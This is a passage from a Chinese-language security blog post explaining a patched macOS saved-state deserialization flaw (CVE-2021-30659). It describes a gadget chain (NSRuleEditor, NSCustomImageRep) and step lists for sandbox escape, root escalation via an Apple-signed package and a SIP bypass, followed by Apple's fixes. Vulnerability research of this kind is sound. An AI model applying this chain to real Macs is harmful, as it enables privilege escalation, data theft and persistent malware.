|...........&#125;.J..|</span><br><span class="line"><span class="number">000000</span>c0  d0 aa <span class="number">40</span> <span class="number">16</span> <span class="number">81</span> fc b9 a5  f5 <span class="number">88</span> <span class="number">2b</span> <span class="number">70</span> cd <span class="number">1</span>a <span class="number">48</span> <span class="number">94</span>  |..@.......+p..H.|</span><br><span class="line"><span class="number">000000</span>d0  <span class="number">47</span> <span class="number">3</span>d <span class="number">4f</span> <span class="number">92</span> <span class="number">76</span> <span class="number">3</span>a ee <span class="number">34</span>  <span class="number">79</span> <span class="number">05</span> <span class="number">3f</span> <span class="number">5</span>d <span class="number">68</span> <span class="number">57</span> <span class="number">7</span>d b0  |G=O.v:<span class="number">.4</span>y.?]hW&#125;.|</span><br><span class="line"><span class="number">000000e0</span>  <span class="number">54</span> <span class="number">6f</span> <span class="number">80</span> <span class="number">4</span>e <span class="number">5b</span> <span class="number">3</span>d <span class="number">53</span> <span class="number">2</span>a  <span class="number">6</span>d <span class="number">35</span> a3 c9 <span class="number">6</span>c <span class="number">96</span> <span class="number">5f</span> a5  |To.N[=S*m5..l._.|</span><br><span class="line"><span class="number">000000f</span>0  <span class="number">06</span> ec <span class="number">4</span>c d3 <span class="number">51</span> b9 <span class="number">15</span> b8  <span class="number">29</span> f0 <span class="number">25</span> <span class="number">48</span> <span class="number">2b</span> <span class="number">6</span>a <span class="number">74</span> <span class="number">9f</span>  |..L.Q...).%H+jt.|</span><br><span class="line"><span class="number">00000100</span>  <span class="number">1</span>a <span class="number">5b</span> <span class="number">5</span>e f1 <span class="number">14</span> db aa <span class="number">8</span>d  <span class="number">13</span> <span class="number">9</span>c ef d6 f5 <span class="number">53</span> f1 <span class="number">49</span>  |.[^..........S.I|</span><br><span class="line"><span class="number">00000110</span>  <span class="number">4</span>d <span class="number">78</span> <span class="number">5</span>a <span class="number">89</span> <span class="number">79</span> f8 bd <span class="number">68</span>  <span class="number">3f</span> <span class="number">51</span> a2 a4 <span class="number">04</span> ee d1 <span class="number">45</span>  |MxZ.y..h?Q.....E|</span><br><span class="line"><span class="number">00000120</span>  <span class="number">65</span> ba c4 <span class="number">40</span> ad db e3 <span class="number">62</span>  <span class="number">55</span> <span class="number">59</span> <span class="number">9</span>a <span class="number">29</span> <span class="number">46</span> <span class="number">2</span>e <span class="number">6</span>c <span class="number">07</span>  |e..@...bUY.)F.l.|</span><br><span class="line"><span class="number">00000130</span>  <span class="number">34</span> <span class="number">68</span> e9 <span class="number">00</span> <span class="number">89</span> <span class="number">15</span> <span class="number">37</span> <span class="number">1</span>c  ff c8 a5 d8 <span class="number">7</span>c <span class="number">8</span>d b2 f0  |<span class="number">4</span>h...<span class="number">.7</span>.....|...|</span><br><span class="line"><span class="number">00000140</span>  <span class="number">4b</span> c3 <span class="number">26</span> f9 <span class="number">91</span> f8 c4 <span class="number">2</span>d  <span class="number">12</span> <span class="number">4</span>a <span class="number">09</span> ba <span class="number">26</span> <span class="number">1</span>d <span class="number">00</span> <span class="number">13</span>  |K.&amp;....-.J..&amp;...|</span><br><span class="line"><span class="number">00000150</span>  <span class="number">65</span> ac e7 <span class="number">66</span> <span class="number">80</span> c0 e2 <span class="number">55</span>  ec <span class="number">9</span>a <span class="number">8</span>e <span class="number">09</span> cb <span class="number">39</span> <span class="number">26</span> d4  |e..f...U....<span class="number">.9</span>&amp;.|</span><br><span class="line"><span class="number">00000160</span>  c8 <span class="number">15</span> <span class="number">94</span> d8 <span class="number">2</span>c <span class="number">8b</span> fa <span class="number">79</span>  <span class="number">5f</span> <span class="number">62</span> <span class="number">18</span> <span class="number">39</span> f0 a5 df <span class="number">0b</span>  |....,..y_b<span class="number">.9</span>....|</span><br><span class="line"><span class="number">00000170</span>  <span class="number">3</span>d a4 <span class="number">5</span>c bc <span class="number">30</span> d5 <span class="number">2b</span> cc  <span class="number">08</span> <span class="number">88</span> c8 <span class="number">49</span> d6 ab c0 e1  |=.\<span class="number">.0</span>.+....I....|</span><br><span class="line"><span class="number">00000180</span>  c1 e5 <span class="number">41</span> eb <span class="number">3</span>e <span class="number">2b</span> <span class="number">17</span> <span class="number">80</span>  c4 <span class="number">01</span> <span class="number">64</span> <span class="number">3</span>d <span class="number">79</span> be <span class="number">82</span> aa  |..A.&gt;+....d=y...|</span><br><span class="line"><span class="number">00000190</span>  <span class="number">3</span>d <span class="number">56</span> <span class="number">8</span>d bb e5 <span class="number">7</span>a ea <span class="number">89</span>  <span class="number">0f</span> <span class="number">4</span>c dc <span class="number">16</span> <span class="number">03</span> e9 <span class="number">2</span>a d8  |=V...z...L....*.|</span><br><span class="line"><span class="number">000001</span>a0  c5 <span class="number">3</span>e <span class="number">25</span> ed c2 <span class="number">4b</span> <span class="number">65</span> da  <span class="number">8</span>a d9 <span class="number">0</span>d d9 <span class="number">23</span> <span class="number">92</span> fd <span class="number">06</span>  |.&gt;%..Ke.....#...|</span><br><span class="line">[...]</span><br></pre></td></tr></table></figure>

<p>漏洞在于存储在data.data中的加密序列化对象没有使用安全编码API。</p>
<h3 id="Objective-C-serialization"><a href="#Objective-C-serialization" class="headerlink" title="Objective-C serialization"></a>Objective-C serialization</h3><p>类可以通过NSCoding实现序列化，实现的类必须包含Coder方法：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">- (<span class="type">id</span>)initWithCoder:(<span class="built_in">NSCoder</span> *)coder;</span><br></pre></td></tr></table></figure>

<p>在这个方法中，对象可以使用coder去解码它的实例变量，可以使用的方法有：<code>-decodeObjectForKey:</code>, <code>-decodeIntegerForKey:</code>, <code>-decodeDoubleForKey:</code>等。当使用-decodeObjectForKey:方法时，可以在该对象上递归调用-initWithCoder:方法，直至解码整个对象。</p>
<p>Apple认识到-decodeObjectForKey:方法是有风险的，于是在10.8上加入了 <code>NSSecureCoding</code>安全编码方法。</p>
<p>原本的方法是先创建一个对象，再检查它的类型，引入安全编码后，变成了在解码时，需要先指定一系列类。</p>
<p>不安全的：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">id</span> obj = [decoder decodeObjectForKey:<span class="string">@&quot;myKey&quot;</span>];</span><br><span class="line"><span class="keyword">if</span> (![obj isKindOfClass:[MyClass <span class="keyword">class</span>]]) &#123; <span class="comment">/* ...fail... */</span> &#125;</span><br></pre></td></tr></table></figure>

<p>安全的：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">id</span> obj = [decoder decodeObjectOfClass:[MyClass <span class="keyword">class</span>] forKey:<span class="string">@&quot;myKey&quot;</span>];</span><br></pre></td></tr></table></figure>

<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>利用思路</h2><p>在保存状态的data.data文件中，对象是使用NSKeyedArchiver储存的，没有启用安全编码。这意味着我们可以包括任何实现NSCoding协议的类的对象。可能的原因是，应用程序可以用他们自己的对象来扩展保存的状态，由于保存的状态功能比NSSecureCoding要老，苹果不能直接将其升级为安全编码，因为这可能会影响第三方应用程序运行。</p>
<p>有两个对象相结合可以实现漏洞利用。</p>
<h3 id="NSRuleEditor"><a href="#NSRuleEditor" class="headerlink" title="NSRuleEditor"></a>NSRuleEditor</h3><p>这个类的 <code>-initWithCoder:</code>方法创建了一个同一存档中的对象的绑定，其key路径也是从存档中获得的。<a target="_blank" rel="noopener" href="https://developer.apple.com/library/archive/documentation/Cocoa/Conceptual/CocoaBindings/CocoaBindings.html">Bindings</a>是Cocoa中的反应式编程技术。创建绑定：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">- (<span class="type">void</span>)bind:(<span class="built_in">NSBindingName</span>)binding </span><br><span class="line">    toObject:(<span class="type">id</span>)observable </span><br><span class="line"> withKeyPath:(<span class="built_in">NSString</span> *)keyPath </span><br><span class="line">     options:(<span class="built_in">NSDictionary</span>&lt;<span class="built_in">NSBindingOption</span>, <span class="type">id</span>&gt; *)options;</span><br></pre></td></tr></table></figure>

<p>这将把observable的keyPath和接收者的属性binding进行绑定。例如，又一个Person类，其有一个属性 <code>@property (readwrite, copy) NSString *name;</code>，然后可以把界面text的值和Person的name（keyPath）绑定起来。</p>
<p>不同的keypath的options含义选实际上是非常复杂的。例如，当用 “foo “这个关键路径进行绑定时，它首先会检查getFoo、foo、isFoo和_foo这些方法是否存在。这通常会被用来访问对象的一个属性，但这不是必须的。当一个绑定被创建时，该方法将在创建绑定时被立即调用，以提供一个初始值。这意味着，通过在反序列化过程中创建一个绑定，我们可以用它来调用其他反序列化对象上的零参数方法。</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">ID <span class="built_in">NSRuleEditor</span>::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)</span><br><span class="line">&#123;</span><br><span class="line">	...</span><br><span class="line"></span><br><span class="line">	<span class="type">id</span> arrayOwner = [unarchiver decodeObjectForKey:<span class="string">@&quot;NSRuleEditorBoundArrayOwner&quot;</span>];</span><br><span class="line"></span><br><span class="line">	...</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (arrayOwner) &#123;</span><br><span class="line">	  keyPath = [unarchiver decodeObjectForKey:<span class="string">@&quot;NSRuleEditorBoundArrayKeyPath&quot;</span>];</span><br><span class="line">	  [<span class="keyword">self</span> bind:<span class="string">@&quot;rows&quot;</span> toObject:arrayOwner withKeyPath:keyPath options:<span class="literal">nil</span>];</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里是利用它调用下一个对象的 <code>-draw</code>方法。</p>
<h3 id="NSCustomImageRep"><a href="#NSCustomImageRep" class="headerlink" title="NSCustomImageRep"></a>NSCustomImageRep</h3><p>这个对象从存档中获取一个对象和一个selector (a method name)。当调用 <code>-draw</code>方法时，它触发对象的selector方法，并将自己作为第一个参数传递进去：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">ID <span class="built_in">NSCustomImageRep</span>::initWithCoder:(ID param_1,SEL param_2,ID unarchiver)</span><br><span class="line">&#123;</span><br><span class="line">	...</span><br><span class="line">	<span class="type">id</span> drawObject = [unarchiver decodeObjectForKey:<span class="string">@&quot;NSDrawObject&quot;</span>];</span><br><span class="line">	<span class="keyword">self</span>.drawObject = drawObject;</span><br><span class="line">	<span class="type">id</span> drawMethod = [unarchiver decodeObjectForKey:<span class="string">@&quot;NSDrawMethod&quot;</span>];</span><br><span class="line">	SEL selector = <span class="built_in">NSSelectorFromString</span>(drawMethod);</span><br><span class="line">	<span class="keyword">self</span>.drawMethod = selector;</span><br><span class="line">	...</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">...</span><br><span class="line"></span><br><span class="line"><span class="type">void</span> ___24-[<span class="built_in">NSCustomImageRep_draw</span>]_block_invoke(<span class="type">long</span> param_1)</span><br><span class="line">&#123;</span><br><span class="line">  ...</span><br><span class="line">  [<span class="keyword">self</span>.drawObject performSelector:<span class="keyword">self</span>.drawMethod withObject:<span class="keyword">self</span>];</span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过反序列化这两个类，我们现在可以调用零参数方法和多参数方法，尽管第一个参数将是一个NSCustomImageRep对象，其余的参数将是寄存器中的值。</p>
<h2 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h2><h3 id="沙箱逃逸"><a href="#沙箱逃逸" class="headerlink" title="沙箱逃逸"></a>沙箱逃逸</h3><p>原本状态保存的路径为：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~/Library/Saved Application State/&lt;Bundle ID&gt;.savedState/</span><br></pre></td></tr></table></figure>

<p>如果应用程序在用户关闭计算机时打开过，那么这将是一个指向容器路径的符号链接。</p>
<p>沙箱的存储路径：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~/Library/Containers/&lt;Bundle ID&gt;/Data/Library/Saved Application State/&lt;Bundle ID&gt;.savedState/</span><br></pre></td></tr></table></figure>

<p>大多数应用程序不能访问所有文件。沙盒应用程序当然是非常受限制的，但随着TCC的加入，即使是访问下载、文档等文件夹也需要用户批准。如果应用程序想要保存或打开一个文件，但只能看到该应用程序可以访问的文件，那就相当不方便了。为了解决这个问题，在打开这样一个面板时，系统会启动一个进程：com.apple.appkit.xpc.openAndSavePanelService。尽管窗口本身是应用程序的一部分，但其内容是由openAndSavePanelService绘制的。这是一个XPC服务，可以完全访问所有文件。当用户在面板中选择一个文件时，应用程序获得对该文件的临时访问权。这样一来，即使在没有权限列出这些文件的应用程序中，用户仍然可以浏览他们的整个磁盘。</p>
<p>我们注意到的是，这个XPC服务读取了它的保存状态，<strong>但使用的是启动它的应用程序的bundle ID</strong>，由于这个面板可能是多个应用程序的保存状态的一部分，它需要为每个应用程序分离其状态，这确实有些道理。</p>
<p>结果是，它从容器外的位置读取其保存的状态，但使用应用程序的bundle ID：</p>
<figure class="highlight objectivec"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">~/Library/Saved Application State/&lt;Bundle ID&gt;.savedState/</span><br></pre></td></tr></table></figure>

<p>沙箱逃逸步骤：</p>
<ol>
<li>如果符号链接尚不存在，则等待用户在应用程序打开时关机。</li>
<li>在应用程序自己的容器内写入恶意的data.data和windows.plist文件。</li>
<li>打开一个NSOpenPanel或NSSavePanel。</li>
</ol>
<p>com.apple.appkit.xpc.openAndSavePanelService进程会反序列化恶意对象，让我们在一个非沙盒进程中执行代码。</p>
<p>这比其他问题更早被修复，在macOS 11.3中被列为CVE-2021-30659。苹果通过不再从com.apple.appkit.xpc.openAndSavePanelService中的相同位置加载状态来解决这个问题。</p>
<h3 id="权限提升"><a href="#权限提升" class="headerlink" title="权限提升"></a>权限提升</h3><p>通过将我们的代码注入一个具有特定权限的应用程序，我们可以将我们的权限提升到root。为此，我们可以应用A2nkF在<a target="_blank" rel="noopener" href="https://a2nkf.github.io/unauthd_Logic_bugs_FTW/">Unauthd - Logic bugs FTW</a>中介绍的技术。</p>
<p>一些应用程序有一个com.apple.private.AuthorizationServices的权限，其中包含system.install.apple-software的值。这意味着这个应用程序被允许安装有苹果签名的软件包，而无需用户授权。例如，”Install Command Line Developer Tools.app “和 “Bootcamp Assistant.app “有这个权利。A2nkF还发现了一个由苹果签名的软件包，其中包含一个漏洞：macOSPublicBetaAccessUtility.pkg。当这个软件包被安装到一个特定的磁盘时，它将从该磁盘运行（以root身份）一个安装后脚本。该脚本假定它被安装到含有macOS的磁盘上，但这并没有被检查。因此，通过在同一位置创建一个恶意脚本，就有可能通过安装这个软件包以root身份执行代码。</p>
<p>漏洞利用步骤：</p>
<ol>
<li>创建一个RAM磁盘，并复制一个恶意脚本到将由macOSPublicBetaAccessUtility.pkg执行的路径。</li>
<li>通过为该应用程序创建windows.plist和data.data文件，将我们的代码注入含有system.install.apple-software权利的应用程序中，然后启动它。</li>
<li>使用注入的代码将macOSPublicBetaAccessUtility.pkg包安装到RAM磁盘。</li>
<li>等待安装后脚本的运行。</li>
</ol>
<p>在A2nkF的文章中，安装后脚本的运行没有SIP的文件系统限制。它从安装过程中继承了这一点，因为软件包的安装可能需要写到SIP保护的位置。这一点已被苹果公司修复：安装后和安装前的脚本不再有SIP豁免。然而，该软件包及其特权升级仍然可以使用，因为苹果仍然使用相同的脆弱的安装包。</p>
<h3 id="SIP绕过"><a href="#SIP绕过" class="headerlink" title="SIP绕过"></a>SIP绕过</h3><p>现在我们已经逃离了沙盒，并将我们的权限提升到了root。我们在macOS Big Sur Beta安装盘镜像上找到了一些东西。”macOS Update Assistant.app “有com.apple.rootless.install.heritable的权利。这意味着这个进程可以写到所有受SIP保护的位置（而且它是可继承的，这很方便，因为我们可以直接生成一个shell）。虽然它应该只在测试版安装时使用，但我们可以把它复制到正常的macOS环境中，并在那里运行它。</p>
<p>漏洞利用步骤：</p>
<ol>
<li>为 “macOS Update Assistant.app “创建恶意的windows.plist和data.data文件。</li>
<li>启动 “macOS Update Assistant.app”。</li>
</ol>
<p>当免于SIP的文件系统限制时，我们可以从受保护的位置读取所有文件，如用户的Mail.app邮箱。我们还可以修改TCC数据库，这意味着我们可以授予自己访问网络摄像头、麦克风等的权限。我们还可以将我们的恶意软件持续存在于受SIP保护的位置，使苹果以外的人很难删除它。最后，我们可以改变批准的内核扩展数据库。这意味着，我们可以默默地加载一个新的内核扩展，而不需要用户批准。当与一个易受攻击的内核扩展（或一个允许签署内核扩展的编码证书）相结合时，我们将能够获得内核代码执行，这也将允许禁用所有其他限制。</p>
<h2 id="修复"><a href="#修复" class="headerlink" title="修复"></a>修复</h2><p>苹果在11.3中首先修复了沙盒逃逸，不再读取com.apple.appkit.xpc.openAndSavePanelService中应用程序的保存状态（CVE-2021-30659）。</p>
<p>修复该漏洞的其余部分则更为复杂。第三方应用程序可能会在保存状态中存储自己的对象，这些对象可能不支持安全编码。方法：-applicationSupportsSecureRestorableState:。应用程序现在可以通过从该方法返回TRUE来选择是否需要对其保存状态进行安全编码。除非应用程序选择加入，否则它将继续允许非安全编码，这意味着进程注入可能仍然存在。</p>
<p>这确实突出了这些安全措施的当前设计的一个问题：降级攻击。一个应用程序的代码签名（以及由此产生的权利）将在很长一段时间内保持有效，如果应用程序被降级，应用程序的TCC权限仍将有效。一个没有沙盒的应用程序可以默默地下载一个旧的、有漏洞的应用程序版本，并利用它。对于SIP绕过来说，这将不起作用，因为 “macOS Update Assistant.app “不能在macOS Monterey上运行，因为某些私有框架不再包含必要的符号。但这是一个巧合的修复，在许多其他情况下，旧的应用程序可能仍然运行良好。因此，只要对旧的macOS应用程序有向后的兼容性，这个漏洞就会一直存在。</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/30/Android%E5%AE%89%E5%85%A8%E7%AC%94%E8%AE%B0/" rel="prev" title="Android安全笔记">
                  <i class="fa fa-angle-left"></i> Android安全笔记
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">buffer0verflooow</span>
  </div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
